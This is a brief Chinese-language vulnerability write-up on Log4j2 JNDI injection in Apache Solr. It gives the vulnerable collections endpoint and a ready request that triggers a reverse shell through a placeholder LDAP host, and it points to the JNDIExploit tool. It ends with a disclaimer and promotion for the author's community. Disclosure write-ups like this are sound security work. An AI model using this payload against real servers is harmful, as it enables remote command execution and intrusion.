一:漏洞描述?
经过Log4j2漏洞的出现,攻击面逐渐被展开,同时 Apache Solr 也用到了此组件,能通过发送特定的请求包造成远程命令执行
兄弟篇 – log4j2漏洞探索之一:Apache Struts2框架静态文件访问带来的漏洞隐患
二: 漏洞影响?
Apache Solr
三: 漏洞复现?
根据官方文件可以得知 Collections 的调用参数
我们可以设想通过可控的 Collections 来进行 JNDI注入,路径为
/solr/admin/collections?action=xxxxx
可以使用工具 https://github.com/feihong-cs/JNDIExploit 进行反弹Shell操作
/solr/admin/collections?action=${jndi:ldap://xxx/Basic/ReverseShell/ip/9999}&wt=json
四: 关于文库?
https://www.yuque.com/peiqiwiki
最后
下面就是文库的公众号啦,更新的文章都会在第一时间推送在交流群和公众号
想要加入交流群的师傅公众号点击交流群加我拉你啦~
别忘了Github下载完给个小星星⭐
同时知识星球也开放运营啦,希望师傅们支持支持啦?
知识星球里会持续发布一些漏洞公开信息和技术文章~
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。
PeiQi文库 拥有对此文章的修改和解释权如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。
原文始发于微信公众号(PeiQi文库):Log4j2 漏洞探索之一:Apache Solr 远程命令执行